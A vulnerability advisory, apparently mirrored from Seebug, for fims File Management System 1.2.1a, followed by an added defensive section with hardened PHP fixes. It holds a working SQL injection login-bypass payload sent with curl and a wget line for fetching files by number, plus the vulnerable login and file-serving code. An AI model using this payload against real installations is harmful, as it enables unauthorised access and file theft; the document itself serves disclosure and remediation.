fims File Management System <= 1.2.1a Multiple Vulnerabilities

ID SSV:72243
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.

# Exploit Title: fims - File Management System <= 1.2.1a SQL Injection and Vulnerability
# Date: 2011-10-19
# Author: Skraps (jackie.craig.sparks(at) jackie.craig.sparks(at) @skraps_foo)
# Software Link:
# Version: 1.2.1a (tested)

PoC (POST or GET data)
curl --data "') or id=ABS('1"
wget "{anyfile number}"

Vulnerable code
Line 18 of index.php:
  if (login($g_db, $_REQUEST[email], $_REQUEST[password]))
Line 117 of functions.php:
        function login($db, $email, $password) {
                // $email and $password are concatenated straight into the query.
                // A password of  ') or id=ABS('1  turns the WHERE clause into
                // ... password=md5('') or id=ABS('1')  which matches every row.
                $rs = $db->execute("select * from fims_user where email='$email' and password=md5('$password')");
                if ($db->numrows($rs)>0) return true;
                else return false;
        }

Line 51 of index.php:
                if (isset($_REQUEST[f])) {
                        // The raw f parameter is passed to the lookup and the file it
                        // resolves to is served; nothing in this snippet validates the
                        // value or checks that the requester may read that file.
                        $file = get_file_data($g_db, $_REQUEST[f]);
                        header("Accept-Ranges: bytes");
                        header("Content-Length: ".filesize("files/".$file[id]));
                        header("Content-Type: {$file[mime]}");
                        header("Content-Disposition: inline; filename=\"{$file['label']}\";");
                        // ...
                }
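The two fixes a maintainer would apply to the code above, as an added example that is not part of the advisory or of the fims project: parameterised queries so the request data is never parsed as SQL, and strict validation of the f parameter plus a path containment check before a file is served. It assumes a PDO connection $pdo, the fims_user table and columns named on this page, a hypothetical fims_file table, and that fims_user.password stores password_hash() output instead of md5.

```php
<?php
// Defender-side example, not fims code. Assumptions: a PDO handle $pdo, the
// fims_user table from the advisory, a hypothetical fims_file(id, mime, label)
// table, and password hashes produced by password_hash() rather than md5().

// Hardened login(): the email is bound as a parameter, so a value such as
// ') or id=ABS('1 is compared as a literal string, and the password is
// verified in PHP instead of inside the SQL statement.
function login_safe(PDO $pdo, string $email, string $password): bool
{
    $stmt = $pdo->prepare('SELECT password FROM fims_user WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;
    }
    return password_verify($password, $row['password']);
}

// Hardened "?f=" handling: only a positive integer id is accepted, the row is
// fetched with a bound parameter, and the resolved path must stay inside the
// files/ directory before any header is emitted. Returns null on any failure.
function get_file_data_safe(PDO $pdo, $f, string $filesDir): ?array
{
    $id = filter_var($f, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, mime, label FROM fims_file WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $file = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($file === false) {
        return null;
    }
    $base = realpath($filesDir);
    $path = realpath($filesDir . '/' . (string) $file['id']);
    // realpath() is false for a missing file; the prefix check keeps the
    // served path under files/ even if the id column were ever tampered with.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($base === false || $path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    $file['path'] = $path;
    return $file;
}
```

Per-user authorisation (whether this account may read this file id) still belongs in get_file_data_safe or its caller; the check above only stops injection and path escape.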